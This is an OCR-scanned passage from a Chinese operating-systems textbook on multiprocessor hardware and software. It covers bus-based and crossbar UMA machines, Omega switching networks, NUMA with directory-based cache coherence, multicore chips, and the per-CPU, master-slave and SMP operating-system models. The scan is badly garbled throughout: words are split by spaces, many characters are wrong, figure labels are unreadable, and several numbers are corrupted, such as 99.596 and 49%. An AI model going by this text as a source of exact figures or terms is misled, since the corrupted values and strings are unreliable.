问 ) 多 处 理 机 。 相 反 ，NUMA (Nonuniform Memory Access， 非 一 致 存 
储 器 访问 ) 多 处 理 机 就 没有 这 种 特性 。 至 于 为 何 有 这 种 差别 ， 稍 后 会 
加 以 说 明 。 我 们 将 首先 考察 UMA 多 处 理 机 ， 然 后 讨论 NUMA 多 处 理 
机 。 


1. 基 于 总 线 的 UMA 多 处 理 机 体系 结构 


最 简单 的 多 处 理 机 是 基于 单 总 线 的 ， 参 见 岁 8-2a。 两 个 或 更 多 的 
CPU 以 及 一 个 或 多 个 存储 事 模 块 都 使 用 同一 个 总 线 进行 通信 。 当 一 个 
CPU 需要 读 一 个 存储 器 字 (memory word) 时 ， 它 首先 检查 总 线 忙 否 。 
如 果 总 线 空闲 ， 该 CPU 把 所 需 字 的 地 址 放 到 总 线 上 ， 发 出 若干 控制 信 
号 ， 然 后 等 待 存储 器 把 所 需 的 字 放 到 总 线 上 。 


当 某 个 CPU 需要 读 写 存储 器 时 ， 如 果 总 线 忙 ，CPU 只 是 等 待 ， 直 
到 总 线 空 几 。 这 种 设计 存在 问题 。 在 只 有 两 三 个 CPU 时 ， 对 总 线 的 争 
村 还 可 以 管理 ， 若 有 32 个 或 64 个 CPU 时 ， 就 不 可 忍受 了 。 这 种 系统 完 
全 受到 总 线 带 宽 的 限制 ， 多 数 CPU 在 大 部 分 时 间 里 是 空间 的 。 


这 一 问题 的 解决 方案 是 为 每 个 CPU 添 加 一 个 高 速 缓存 (cache) , 
如 图 8-2bD 所 示 。 这 个 高 速 缓存 可 以 位 于 CPU 心 片 的 内 部 、CPU 附 近 、 在 
处 理 器 板 上 或 所 有 这 三 种 方式 的 组 合 。 由 于 许多 读 操作 可 以 从 本 地 高 
速 缓 存 上 得 到 满足 ， 总 线 流量 就 大 大 减少 了 ， 这 样 系统 就 能 够 支持 更 
多 的 CPU。 一 般 而 言 ， 高 速 缓存 不 以 单个 字 为 基础 ， 而 是 以 32 字 市 或 
64 字 节 块 为 基础 。 当 引用 一 个 字 时 ， 它 所 在 的 整个 数据 块 (叫做 一 个 
cache 行 ) 被 取 到 使 用 它 的 CPU 的 高 速 缓存 当中 。 


私有 存储 器 . 共享 
JRE IR at 存储 器 
总 线 
a) b) 0) 


Al 8-2 三 类 基于 总 线 的 多 处 理 机 : a) 没 有 高 速 缓存 ，b) 有 高 速 组 
F: c) 有 高 速 缓存 与 私有 存储 器 


每 一 个 高 速 缓存 块 或 者 被 标记 为 只 读 (在 这 种 情况 下 ， 它 可 以 同 
时 存在 于 多 个 高 速 缓存 中 ) ， 或 者 标记 为 读 写 (在 这 种 情况 下 ， 它 不 
能 在 其 他 高 速 缓存 中 存在 ) 。 如 果 CPU 试 图 在 一 个 或 多 个 远程 高 速 缓 
存 中 写 入 一 个 字 ， 总 线 便 件 检测 到 写 ， 并 把 一 个 信号 放 到 总 线 上 通知 
所 有 其 他 的 高 速 缓存 。 如 果 其 他 高 速 缓存 有 个 “干净 ”的 副本 ， 也 就 是 
同 存 储 右 内 容 完 全 一 样 的 副本 ， 那 么 它们 可 以 丢弃 该 副本 并 让 写 者 在 


修改 之 前 从 存储 器 取出 高 速 缓存 块 。 如 果 某 些 其 他 高 速 缓存 

有 “ 脏 ”( 被 修改 过 ) 副本 ， 它 必须 在 处 理 写 之 前 把 数据 写 回 存储 器 或 
者 把 它 通 过 总 线 直接 传送 到 写 者 上 。 高 速 缓存 这 一 套 规 则 被 称 为 高 束 
缓存 一 致 性 协议 ， 它 是 诸多 协议 之 一 。 


还 有 为 一 种 可 能 性 就 古 图 8-2c 中 的 设计 ， 在 这 种 设计 中 每 个 CPU 不 
止 有 一 个 高 速 缓存 ， 还 有 一 个 本 地 的 私有 存储 侨 ， 它 通过 一 条 专门 的 
(私有 ) 总 线 访问 。 为 了 优化 使 用 这 一 配置 ， 编 译 器 应 该 把 所 有 程序 
的 代码 、 字 符 串 、 常 量 以 及 其 他 只 读数 据 、 栈 和 局 部 变量 放 进 私有 存 
储 器 中 。 而 共享 存储 器 只 用 于 可 写 的 共享 变量 。 在 多 数 情况 下 ， 这 种 
仔细 的 放置 会 极 大 地 减少 总 线 流量 ， 但 是 这 样 做 需要 编译 人 的 积极 配 
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2. 使 用 交叉 开关 的 UMA 多 处 理 机 


即使 有 最 好 的 高 速 缓存 ， 单 个 总 线 的 使 用 还 是 把 UMA 多 处 理 机 的 
数量 限制 在 16 至 32 个 CPU。 要 超过 这 个 数量 ， 需 要 不 同类 型 的 互连网 
络 。 连 接 n 个 CPU 到 k 个 存储 器 的 最 简单 的 电路 是 交叉 开关 ， 人 参见 图 8- 
3。 交 叉 开 关 在 电话 交换 系统 中 已 经 采用 了 几 十 年 ， 用 于 把 一 组 进 线 以 
任意 方式 连接 到 一 组 出 线 上 。 


存储 器 
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a) 
图 8-3 a)8x83C MIF; b) 打 开 的 交叉 点 ;gg 闭合 的 交叉 点 


水 平 线 OHR) MERR (出 线 ) 的 每 个 相交 位 置 上 是 一 个 交叉 
点 (crosspoint) 。 交 义 点 是 一 个 以 电子 方式 开关 的 小 开关 ， 上 有 具体 取决 
于 水 平 线 和 垂直 线 是 否 需 要 连接 。 在 图 8-3a 中 我 们 看 到 有 三 个 交叉 点 同 
时 闭合 ， 人 允许 CPU， 存储 器 ) 对 (010, 000) > (101, 101) 和 
(110，010) 同时 连接 。 其 他 的 连接 也 是 可 能 的 。 事 实 上 ， 组 合 的 数 
量 等 于 象棋 盘 上 8 个 棋子 安全 放置 方式 的 数量 〈8 旺 后 问题 ) 。 


交叉 开关 最 好 的 一 个 特性 是 它 征 一 个 非 阻 塞 网 络 ， 即 不 会 因 有 些 
交叉 点 或 连 线 已 经 被 占据 了 而 拒绝 连接 (假设 存储 器 模块 自身 是 可 用 


的 ) 。 而 且 并 不 需要 预先 的 规划 。 即 使 已 经 设置 了 7 个 任意 的 连接 ， 还 
有 可 能 把 剩余 的 CPU 连 接 到 剩余 的 存储 右上 。 


当然 ， 当 两 个 CPU 同 时 试图 访问 同一 个 模块 的 时 候 ， 对 内 存 的 争 
村 还 是 可 能 的 。 不 过 ， 通 过 将 内 存 分 为 n 个 单元 ， 与 图 8-2 的 模型 相 比 ， 
这 样 的 争夺 概率 可 以 降 至 1/n。 


交叉 开关 最 差 的 一 个 特性 是 ， 交 叉 点 的 数量 以 mn 方式 增长 。 若 有 
1000 个 CPU 和 1000 个 存储 器 我 们 就 需要 一 百 万 个 交 义 点 。 这 样 大 数量 
的 交叉 开关 是 不 可 行 的 。 不 过 ， 无 论 如 何 对 于 中 等 规模 的 系统 而 言 ， 
交叉 开关 的 设计 是 可 用 的 。 


3. 使 用 多 级 交换 的 UMA 多 处 理 机 


有 一 种 完全 不 同 的 、 基 于 简单 2x2 开 关 的 多 处 理 机 设计 ， 参 见 图 8- 
4a。 这 个 开关 有 两 个 输入 和 两 个 输出 。 到 达 任 意 一 个 输入 线 的 消息 可 
以 被 交换 至 任意 一 个 输出 线 上 。 就 我 们 的 目标 而 言 ， 消 息 可 由 四 个 音 
分 组 成 ， 参 见 图 8-4b。Module (模块 ) 域 指明 使 用 哪个 存储 器 。 
Address (地 址 ) 域 指 定 在 模块 中 的 地 址 。Opcode (操作 码 ) 给 定 了 操 
作 ， 如 READ 或 WRITE。 最 后 ， 在 可 选 的 Value UE) 域 中 可 包含 一 个 
操作 数 ， 比 如 一 个 要 被 WRITE 写 入 的 32 位 字 。 该 开关 检查 Module 域 并 
利用 它 确定 消息 是 应 该 送 给 X 还 是 发 送 给 Y。 


a) b) 


图 8-4 a) 一 个 带 有 A 和 B 两 个 输入 线 以 及 X 和 Y 两 个 输出 线 的 2x2 的 开 
X; b) 消 息 格 式 


这 个 2x2 开 关 可 有 多 种 使 用 方式 ， 用 以 构建 大 型 的 多 级 交换 网 络 
(Adams 等 人 ，1987; Bhuyan 等 人 ，1989; Kuman 和 Reddy，1987) 。 
有 一 种 是 简单 经 济 的 Omega 网 络 ， 见 图 8-5。 这 里 采用 了 12 个 开关 ， 把 8 
个 CPU 连 授 到 8 个 存储 絮 上 。 推 而 广 之 ， 对 于 n 个 CPU 和 n 个 存储 絮 ， 我 
们 将 需要 log, n 级 ， 每 级 n/2 个 开关 ， 总 数 为 (n/2)log n 个 开关 ， 比 nz 个 
交叉 点 要 好 得 多 ， 特 别 是 当 n 值 很 大 时 。 


Omega 网 络 的 接线 模式 常 被 称 作 全 混 洗 (perfect shuffle) ， 因 为 每 
一 级 信号 的 混合 就 像 把 一 副 牌 分 成 两 半 ， 然 后 再 把 牌 一 张 张 混合 起 
来 。 接 着 看 看 Omega 网 络 是 如 何 工 作 的 ， 假 设 CPU 011 打 算 从 存储 器 模 
块 110 读 取 一 个 字 。CPU 发 送 READ 消 息 给 开关 1D， 它 在 Module 域 包含 
110。1D 开 关 取 110 的 首位 RAM) 并 用 它 进 行路 由 处理 。0 路 由 到 上 
端 输出 ， 而 1 的 路 由 到 下 端 ， 由 于 该 位 为 1， 所 以 消息 通过 低 端 输出 被 
路 由 到 2D。 


所 有 的 第 二 级 开关 ， 包 括 2D， 取 用 第 二 个 比特 位 进行 路 由 。 这 一 
位 还 是 1， 所 以 消息 通过 低 端 输出 转发 到 3D。 在 这 里 对 第 三 位 进行 测 
试 ， 结 果 发 现 是 0。 于 是 ， 消 息 送 往 上 端 输 出 ， 并 达到 所 期 望 的 存储 器 
110。 该 消息 的 路 径 在 图 8-5 中 由 字母 a 标 出 。 
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图 8-5 Omega 交换 网 络 


在 消息 通过 交换 网 络 之 后 ， 模 块 号 的 左 端 的 位 束 不 再 需要 了 。 它 
们 可 以 有 很 好 的 用 途 ， 可 以 用 来 记录 入 线 编写， 这 样 ， 应 管 消 忆 可 以 
找到 返回 路 径 。 对 于 路 径 a， 入 线 编号 分 别 是 0 (向 上 输入 到 1D) 、1 
( 低 输入 到 2D) 和 1 ( 低 输入 到 3D) 。 使 用 011 作 为 应 答 路 由 ， 只 要 从 
右 问 左 读 出 每 位 即 可 。 


在 上 述 这 一 切 进 行 的 同时 ，CPU 001 需 要 往 存 储 器 001 里 写 入 一 个 
字 。 这 里 发 生 的 情况 与 上 面 的 类 似 ， 消 息 分 别 通过 上 、 上 、 下 端 输出 


路 由 ， 由 字母 b 标 出 。 当 消息 到 达 时 ， 从 Module 域 读 出 001， 代 表 了 对 
应 的 路 径 。 由 于 这 两 个 请 求 不 使 用 任何 相同 的 开关 、 连 线 或 存储 器 模 
块 ， 所 以 它们 可 以 并 行 工作 。 


现在 考虑 如 采 CPU 000 同 时 也 请 求 访问 存储 套 模 块 000 会 发 生 什 么 
情况 。 这 个 请 求 会 与 CPU 001 的 请 求 在 开关 3A 处 发 生 冲 突 。 它 们 中 的 
一 个 就 作 须 等 待 。 和 交叉 开关 不 同 ，Omega 网 络 是 一 种 阻塞 网 络 ， 并 
不 是 每 组 请 求 都 可 被 同时 处 理 。 剖 突 可 在 一 条 连 线 或 一 个 开关 中 发 
生 ， 也 可 在 对 存储 万 的 请 求 和 来 目 存储 右 的 应 答 中 产生 。 


显然 ， 很 有 必要 在 多 个 模块 间 均 匀 地 分 散 对 存储 絮 的 引用 。 一 种 
党 用 的 技术 是 把 低位 作为 模块 号 。 例 如 ， 考 虑 一 台 经 常 访问 32 位 字 的 
计算 机 中 面 问 字 世 的 地 址 至 间 ， 低 位 通 单 是 00， 但 接 下 来 的 3 位 会 均匀 
地 分 布 。 将 这 3 位 作为 模块 号 ， 连 续 的 字 会 放 在 连续 的 模块 中 。 而 连续 
字 被 放 在 不 同 模 块 里 的 存储 妖 系 统 被 称 作 交 义 ”(interleaved) 存储 器 系 
统 。 交 叉 存 储 郁 将 并 行 运行 的 效率 最 大 化 了 ， 这 和 是 因为 多 数 对 存储 天 
的 引用 是 连续 编 址 的 。 设 计 非 阻塞 的 交换 网 络 也 是 有 可 能 的 ， 在 这 种 
网 络 中 ， 提 供 了 多 条 从 每 个 CPU 到 每 个 存储 融 的 路 径 ， 从 而 可 以 更 好 


地 分 艇 流量 。 


4.NUMA 多 处 理 机 
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网 络 多 处 理 机 需要 许多 (昂贵 ) 的 硬件 ， 所 以 规模 也 不 是 那么 大 。 要 
想 超过 100 个 CPU 还 必须 做 些 让 步 。 ， 一 种 让 步 束 是 所 有 的 存储 絮 
模块 都 具有 相同 的 访问 时 间 。 这 种 让 步 导 致 了 前 面 所 说 的 NUMA 多 处 
理 机 的 出 现 。 像 UMA 一 样 ， 这 种 机 器 为 所 有 的 CPU 提 供 了 一 个 统一 的 
地 址 空间 ， 但 与 UMA 机 器 不 同 的 是 ， 访 问 本 地 存储 锋 模 块 快 于 访问 远 
程 存 储 器 模块 。 因 此 ， 在 NUMA 机 器 上 运行 的 所 有 UMA 程 序 无 须 做 任 
何 改变 ， 但 在 相同 的 时 钟 速率 下 其 性 能 不 如 UMA 机 器 上 的 性 能 


所 有 NUMA 机 器 都 具有 以 下 三 种 关键 符 性 ， 它 们 使 得 NUMA 机 响 
与 其 他 多 处 理 机 相 区 别 |: 


JJ 具有 对 所 有 CPU 都 可 见 的 单个 地 址 空间 。 
2) 通 过 LOAD 和 STORE 指令 访问 远程 存储 器 
3) 访 问 远程 存储 器 慢 于 访问 本 地 存储 器 


在 对 远程 存储 器 的 访问 时 间 不 被 隐藏 时 〈 因 为 没有 高 速 缓存 ) ， 
系统 被 称 为 NC-NUMA (No Cache NUMA ， 无 高 速 缓存 NUMA) 。 在 
有 一 致 性 高 速 缓存 时 ， 系 统 被 称 为 CC-NUMA (Cache-Coherent 
NUMA， 高 速 缓存 一 致 NUMA) ° 
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理 机 (directory-based multiprocessor) 。 其 基本 思想 是 ， 维 护 一 个 数据 
库 来 记录 高 速 缓存 行 的 位 置 及 其 状态 。 当 一 个 高 速 缓存 行 被 引用 时 ， 
就 查询 数据 库 找 出 高 速 缓存 行 的 位 置 以 及 它 是 “干净 ”的 还 是 “ 脏 ”( 被 修 
改过 ) 的 。 由 于 每 条 访问 存储 器 的 指令 都 必须 查询 这 个 数据 库 ， 所 以 
它 必 须 配 有 极 高 速 的 专用 人 硬件， 从 而 可 以 在 一 个 总 线 周 期 的 几 分 之 一 
内 作出 响应 。 


要 使 基于 目录 的 多 处 理 机 的 想法 更 具体 ， 让 我 们 考虑 一 个 简单 的 
(假想 ) 例子 ， 一 个 256 个 节点 的 系统 ， 每 个 节点 包括 一 个 CPU 和 通过 
局 部 总 线 连接 到 CPU 上 的 16MB 的 RAM。 整 个 存储 器 有 23? FT, WR 
分 成 2% 个 64 字 下 大 小 的 高 速 缓存 行 。 存储 器 被 静态 地 在 节点 间 分 配 ， 
节点 0 是 0 一 16M， 节 点 1 是 16~32M， 以 此 类 推 。 节 点 通过 互连网 络 连 
接 ， 参 见 图 8-6a。 每 个 节点 还 有 用 于 构成 其 2 字 万 存储 器 的 223 个 64 字 
局 速 缓 存 行 的 目录 项 。 此 刻 ， 我 们 假定 一 行 最 多 被 一 个 高 速 缓存 使 


为 了 了 解 目 录 是 如 何 工 作 的 ， 让 我 们 跟踪 引用 了 一 个 高 速 缓存 行 
的 发 目 CPU 20 的 LOAD 指 令 。 首 和 匈 ， 发 出 该 指令 的 CPU 把 它 交 给 目 己 
的 MMU， 被 翻译 成 物理 地 址 ， 比 如 说 ，0x24000108。MMU 将 这 个 地 
址 拆 分 为 三 个 部 分 ， 如 图 8-6b 所 示 。 这 三 个 部 分 按 十 进 制 是 节点 36、 第 
4 行 和 偏 移 量 8。MMU 看 到 引用 的 存储 器 字 来 自 节 点 36， 而 不 是 节点 


20， 所 以 它 把 请 求 消息 通过 互连网 络 发 送 到 该 高 速 缓存 行 的 的 主 节点 
(home node) 36 上 ， 询 问 行 4 是 否 被 高 速 缓存 ， 如 果 是 ， 高 速 缓存 在 
何 处 。 


节点 0 节点 1 44 354255 
CPU 存储 器 CPU 存储 器 CPU 存储 器 


Lpa ; 
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图 8-6 a)256 个 节点 的 基于 目录 的 多 处 理 机 ;，b)32 位 存储 器 地 址 划分 
Adu; c) TI A36 FAY H ae 


当 请 求 通 过 互连网 络 到 达 节 点 36 时 ， 它 被 路 由 至 目录 硬件 。 硬 件 
检索 其 包含 233 个 表 项 的 目录 表 〈 其 中 的 每 个 表 项 代表 一 个 高 速 缓存 
行 ) 并 解析 到 项 4。 从 图 8-6c 中 ， 我 们 可 以 看 到 该 行 没有 被 高 速 缓 存 ， 


所 以 硬件 从 本 地 RAM 中 取出 第 4 行 ， 送 回 给 市 点 20， 更 新 目录 项 4， 指 
出 该 行 目前 被 高 速 缓存 在 节点 20 处 。 


现在 来 考虑 第 二 个 请 求 ， 这 次 访问 让 点 36 的 第 2 行 。 在 图 8-6c 中 ， 
我 们 可 以 看 到 这 一 行 在 节点 82 处 被 高 速 缓存 。 此 刻 硬 件 可 以 更 新 目录 
项 2， 指 出 该 行 现在 在 节点 20 上 ， 然 后 送 一 条 消 上 给 蔬 点 82， 指 示 把 该 
行 传 给 节点 20 并 且 使 其 自身 的 高 速 缓存 无 效 。 注 意 ， 即 使 一 个 所 谓 “ 共 
享 存储 器 多 处 理 机 ”*"， 在 下 层 仍 然 有 大 量 的 消息 传递 。 


让 我 们 顺便 计算 一 下 有 多 少 存储 右 单 元 被 目录 占用 。 每 个 帮 点 有 
16 MB 的 RAM， 并 且 有 2 个 9 位 的 目录 项 记录 该 RAM。 这 样 目录 上 的 
开支 大 约 是 9x218 位 除 以 16 MB， 即 约 1.76%， 一 般 而 言 这 是 可 接受 的 
(尽管 这 些 都 是 高 速 存储 器 ， 会 增加 成 本 ) 。 即 使 对 于 32 字 节 的 高 速 
缓存 行 ， 开 销 也 只 有 49%“。 至 于 128 字 节 的 高 速 缓存 行 ， 它 的 开销 不 到 
1% ° 


该 设计 有 一 个 明显 的 限制 ， 即 一 行 只 能 被 一 个 节点 高 速 缓存 。 要 
想 允 许 一 行 能 够 在 多 个 节点 上 被 高 速 缓存 ， 我 们 需要 某 种 对 所 有 行 定 
位 的 方法 ， 例 如 ， 在 写 操作 时 使 其 无 效 或 更 新 。 要 人 允许 同时 在 吞 干 市 
上 护 上 进行 高 速 组 存 ， 有 几 种 选择 方案 ， 不 过 对 它们 的 讨论 已 超出 了 本 
书 的 范围 。 


5. 多 核心 片 


随 着 心 片 制造 技术 的 发 展 ， 晶 体 管 的 体积 越 来 越 小 ， 从 而 有 可 能 
将 越 来 越 多 的 晶体 管 放 入 一 个 心 厂 中 。 这 个 基于 经 验 的 发 现 通 第 称 为 
摩尔 定律 (Moore's Law) ， 得 名 于 首次 发 现 该 规律 的 Intel 公 司 创始 人 
之 一 Gordon Moore ° Intel Core 2 Duv AJKA EEA TAL EMKA 
体 管 。 


随 之 一 个 显而易见 的 问题 是 :“ 你 怎么 利用 这 些 蝇 体 管 ? ”按照 我 
们 在 第 1.3.1 小 节 的 讨论 ， 一 个 选择 是 给 忆 片 添加 数 兆 字 节 的 高 速 组 
存 。 这 个 选择 是 认真 的 ， 这 有 4 兆 字 下 片上 高 速 缓存 的 必 片 现在 已 经 很 
常见 ， 并 且 带 有 更 多 片上 高 速 缓存 的 心 片 也 即将 出 现 。 但 是 到 了 某 种 
程度 ， 再 增加 高 速 缓存 的 大 小 只 能 将 命中 率 从 99% 提 高 到 99.596， 而 这 
样 的 改进 并 不 能 显著 提升 应 用 的 性 能 。 


男 一 个 选择 是 将 两 个 或 者 多 个 完整 的 CPU， 通 常 称 为 核 (core) , 
放 到 同一 个 芯片 上 (技术 上 来 说 是 同一 个 小 硅 片 ，。 双 核 和 四 核 的 世 
片 已 经 普及 ， 八 十 核 的 芯片 已 经 被 制造 出 来 ， 而 带 有 上 百 个 核 的 心 
也 即将 出 现 。 


虽然 CPU 可 能 共享 高 速 缓存 或 者 不 共享 (如 图 1-8 所 示 ) ， 但 是 它 
们 都 共享 内 存 。 考 虑 到 每 个 内 存 字 总 是 有 惟一 的 值 ， 这 些 内 存 是 一 致 
的 。 特 殊 的 硬件 电路 可 以 确保 在 一 个 字 同 时 出 现在 两 个 或 者 多 个 的 高 
速 缓存 中 的 情况 下 ， 当 其 中 某 个 CPU 修 改 了 该 字 ， 所 有 其 他 高 速 缓存 


中 的 该 字 都 会 被 自动 地 并 且 原 子 性 地 删除 来 确保 一 致 性 。 这 个 过 程 称 


NRK (snooping) ° 


这 样 设计 的 结果 是 多 核 芯 片 就 相当 于 小 的 多 人 处理 机 。 实 际 上 ， 多 
核 芯 片 时 常 被 称 为 片 级 多 处 理 机 (Chip-level MultiProcessors, 
CMP) 。 从 软件 的 角度 来 看 ，CMP 与 基于 总 线 的 多 人 处理 机 和 使 用 交换 
网 络 的 多 处 理 机 并 没有 太 大 的 差别 。 不 过 ， 它 们 还 是 存在 着 若干 的 差 
别 。 例 如 ， 对 基于 总 线 的 多 处 理 机 ， 每 个 CPU 拥有 自己 的 高 速 缓存 ， 
如 图 8-2b 以 及 图 1-8b 的 AMD 设 计 所 示 。 在 图 1-8a 所 示 的 Intel 使 用 的 共享 
高 速 缓存 的 设计 并 没有 出 现在 其 他 的 多 处 理 机 中 。 共 享 二 级 高 速 缓存 
会 影响 性 能 。 如 果 一 个 核 需 要 很 多 高 速 缓存 空间 ， 而 另 一 个 核 不 需 

这 样 的 设计 允许 它们 各 自 使 用 所 需 的 高 速 缓存 。 但 另 一 方面 ， 共 
享 高 速 缓存 也 让 一 个 贪 禁 的 核 损 害 其 他 核 的 性 能 成 为 了 可 能 。 
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CMP 与 其 他 更 大 的 多 处 理 机 之 间 的 为 一 个 蕾 异 十 容错 。 因 为 CPU 
之 间 的 连接 非常 紧密 ， 一 个 共享 模块 的 失效 可 能 导致 许多 CPU 同 时 出 
错 。 而 这 样 的 情况 在 传统 的 多 处 理 机 中 是 很 少 出 现 的 。 


除了 所 有 核 都 是 对 等 的 对 称 多 核心 片 之 外 ， 还 有 一 类 多 核心 片 被 
称 为 片上 系统 (system on a chip) 。 这 些 忌 片 含有 一 个 或 者 多 个 主 
CPU， 但 是 同时 还 包含 耕 干 个 专用 核 ， 例 如 视频 与 音频 解码 磊 、 加 密 
心 片 、 网 络 接口 等 。 这 些 核 共同 构成 了 完整 的 片上 计算 机 系统 。 
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已 经 来 临 ， 但 是 我 们 还 不 具备 为 它们 编写 应 用 程序 的 能 力 。 现 有 的 编 
程 语言 并 不 适合 编写 高 度 并 行 的 代码 ， 同 时 适用 的 编译 器 和 调试 工具 
还 很 苇 乏 。 几 乎 没有 几 个 程序 员 有 编写 并 行程 序 的 经 验 ， 而 大 部 分 程 
序 员 对 于 如 何 将 工作 划分 为 若干 可 以 并 行 执行 的 块 (package) 知之 其 
少 。 同 步 、 消 除 范 争 、 避 人 免 死 锁 成 为 了 程序 员 的 于 梦 ， 同 时 也 影响 到 
了 性 能 。 信 号 量 (semaphore) 并 不 能 解决 问题 。 除 了 这 些 问题 ， 什 么 
样 的 应 用 真 的 需要 使 用 数 百 个 核 尚 不 明确 。 目 然 语言 语音 识别 可 能 需 
要 大 量 的 计算 能 力 ， 但 这 里 的 问题 并 不 是 缺少 时 钟 周期 ， 而 是 缺 少 可 
行 的 算法 。 简 而 言 之 ， 或 许 硬 件 开 发 人 员 正 在 发 布 软件 开发 人 员 不 知 
道 如 何 使 用 而 用 户 也 并 不 需要 的 产品 。 


8.1.2 ”多 处 理 机 操作 系统 类 型 


让 我 们 从 对 多 处 理 机 硬件 的 讨论 转 到 多 处 理 机 软件 ， 特 别 钙 多 处 
理 机 操作 系统 上 来 。 这 里 有 各 种 可 能 的 方法 。 接 下 来 将 讨论 其 中 的 二 
种 。 需 要 强调 的 是 所 有 这 些 方法 除了 适用 于 多 核 系 统 之 外 ， 同 样 适 用 


于 包含 多 个 分 离 CPU 的 系统 。 


1. 每 个 CPU 有 目 己 的 操作 系统 


组 织 一 个 多 处 理 机 操作 系统 的 可 能 的 最 简单 的 方法 生 ， 静 仿 地 把 
存储 器 划分 成 和 CPU 一 样 多 的 各 个 部 分 ， 为 每 个 CPU 提供 其 私有 存储 
器 以 及 操作 系统 的 各 自私 有 副本 。 实 际 上 n 个 CPUBn 个 独立 计算 机 的 
形式 运行 。 这 样 做 一 个 明显 的 优点 是 ， 允 许 所 有 的 CPU 共享 操作 系统 
的 代码 ， 而 且 只 需要 提供 数据 的 私有 副本 ， 如 图 8-7 所 示 。 


CPU 2 CPU 3 CPU 4 存储 器 IO 
1 12 
3 4 
PRIE ARAN HY 


有 OS 的 
私有 


图 8-7 在 4 个 CPU 中 划分 多 处 理 机 存储 器 ， 但 共享 一 个 操作 系统 代码 
的 副本 。 标 有 “数据 ?字样 的 方 框 是 每 个 CPU 的 操作 系统 私有 数据 


一 机 制 比 有 n 个 分 离 的 计算 机 要 好 ， 因 为 它 人 允许 所 有 的 机 器 共 吾 
一 套 磁 盘 及 其 他 的 IO 设备 ， 它 还 允许 灵活 地 共享 存储 器 。 例 如 ， 即 便 
使 用 静态 内 存 分 配 ， 一 个 CPU 也 可 以 获得 极 大 的 一 块 内 存 ， 从 而 高 效 
地 执行 代码 。 男 外 ， 由 于 生产 者 能 够 直接 把 数据 写 入 存储 器 ， 从 而 使 
得 消费 者 从 生产 者 写 入 的 位 置 取出 数据 ， 因 此 进程 之 间 可 以 高 效 地 通 
信 。 况 且 ， 从 操作 系统 的 角度 看 ， 每 个 CPU 都 有 自己 的 操作 系统 非常 
目 然 。 


值得 提 太 该 设计 看 来 不 明显 的 四 个 方面 。 首 和 完 ， 在 一 个 进程 进行 
系统 调用 时 ， 该 系统 调用 是 在 本 机 的 CPU 上 被 捕获 并 处 理 的 ， 并 使 用 
操作 系统 表 中 的 数据 结构 。 


， 因 为 每 个 操作 系统 都 有 自己 的 表 ， 那 么 它 也 有 自己 的 进程 
集合 ， 通 过 自身 调度 这 些 进程 。 这 里 没有 进程 共享 。 如 果 一 个 用 户 登 
杂 到 CPU 1， 那 么 他 的 所 有 进程 都 在 CPU 1 上 运行 。 因 此 ， 在 CPU 2 有 
负载 运行 而 CPU 1 空 载 的 情形 是 会 发 生 的 。 


第 三 ， 没 有 页 面 共 享 。 会 出 现 如 下 的 情形 : 在 CPU2 不 断 地 进行 页 
面 调 度 时 CPU 1 却 有 多 余 的 页 面 。 由 于 内 存 分 配 是 固定 的 ， 所 以 CPU 2 
无 法 向 CPU 1 借用 页 面 。 


第 四 ， 也 古 最 坏 的 情形 ， 如 来 操作 系统 维护 近期 使 用 过 的 位 副 块 
的 缓冲 区 高 速 缓存 ， 每 个 操作 系统 都 独自 进行 这 种 维护 工作 ， 因 此 ， 
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况 ， 这 将 会 导致 不 一 致 性 的 结果 。 如 免 这 一 问题 的 惟一 途径 是 ， 取 消 
缓冲 区 高 速 缓存 。 这 样 做 并 不 难 ， 但 是 会 显著 降低 性 能 。 


由 于 这 些 原因 ， 上 述 模 型 已 很 少 使 用 ， 尽 管 在 早期 的 多 处 理 机 中 
它 一 度 被 采用 ， 那 时 的 目标 是 把 已 有 的 操作 系统 尽 可 能 快 地 移植 到 新 
的 多 处 理 机 上 。 


2. 主 从 多 处 理 机 


图 8-8 中 给 出 的 是 第 二 种 模型 。 在 这 种 模型 中 ， 损 作 系统 的 一 个 副 
本 及 其 数据 表 都 在 CPU 1 上 ， 而 不 是 在 其 他 所 有 CPU 上 “。 为 了 在 该 CPU 
1 上 进行 处 理 ， 所 有 的 系统 调用 都 重 定向 到 CPU 1 上 “。 如 果 有 剩余 的 
CPU 时 间 ， 还 可 以 在 CPU 1 上 运行 用 户 进程 。 这 种 模型 称 为 主 从 模型 
(master-slave) ， 因 为 CPU 1 是 主 CPU， 而 其 他 的 都 是 从 属 CPU ° 


CPU 1 CPU 2 CPU 3 CPU 4 存储 器 I/O 


主机 运行 | 1A. get 
操作 系统 | saat 


进程 ， 


Al 8-8 主 从 多 处 理 机 模型 


主 从 模型 解决 了 在 第 一 种 模型 中 的 多 数 问 题 。 有 单一 的 数据 结构 
(如 一 个 链表 或 者 一 组 优先 级 链表 ) 用 来 记录 就 绪 进 程 。 当 某 个 CPU 
空 内 下 来 时 ， 它 同 CPU 1 上 的 操作 系统 请 求 一 个 进程 运行 ， 并 被 分 配 一 
个 进程 。 这 样 ， 就 不 会 出 现 一 个 CPU 空闲 而 另 一 个 过 载 的 情形 。 类 似 
地 ， 可 在 所 有 的 进程 中 动态 地 分 配 页 面 ， 而 且 只 有 一 个 缓冲 区 高 速 组 
存 ， 所 以 决 不 会 出 现 不 一 致 的 情形 。 


这 个 模型 的 问题 是 ， 如 果 有 很 多 的 CPU， 主 CPU 会 变 成 一 个 瓶 
颈 。 毕 竟 ， 它 要 处 理 来 自 所 有 CPU 的 系统 调用 。 如 果 全 部 时 间 的 10% 用 
来 处 理 系统 调用 ， 那 么 10 个 CPU 惑 会 使 主 CPU 饮 和， 而 20 个 CPU 就 会 使 
主 CPU 彻 底 过 载 。 可 见 ， 这 个 模型 虽然 简单 ， 而 且 对 小 型 多 处 理 机 是 
可 行 的 ， 但 不 能 用 于 大 型 多 处 理 机 。 


3. 对 称 多 处 理 机 


我 们 的 第 三 种 模型 ， 即 对 称 多 处 理 机 (Symmetric MultiProcessor, 
SMP) ， 消 除了 上 壕 的 不 对 称 性 。 在 存储 器 中 有 操作 系统 的 一 个 副 
本 ， 但 任何 CPU 都 可 以 运行 它 。 在 有 系统 调用 时 ， 进 行 系统 调用 的 
CPU 陷入 内 核 并 处 理 系 统 调 用 。 图 8-9 是 对 SMP 模 式 的 说 明 。 


CPU 4 存储 器 IO 


运行 用 户 
进程 和 


锁 


> 


Al 8-9 SMP 多 处 理 机 模型 


这 个 模型 动态 地 平衡 进程 和 存储 上 融 ， 因 为 它 只 有 一 到 操 作 系 统 交 
据 表 。 它 还 消除 了 主 CPU 的 瓶 贷 ， 因 为 不 存在 主 CPU; 但 是 这 个 模型 
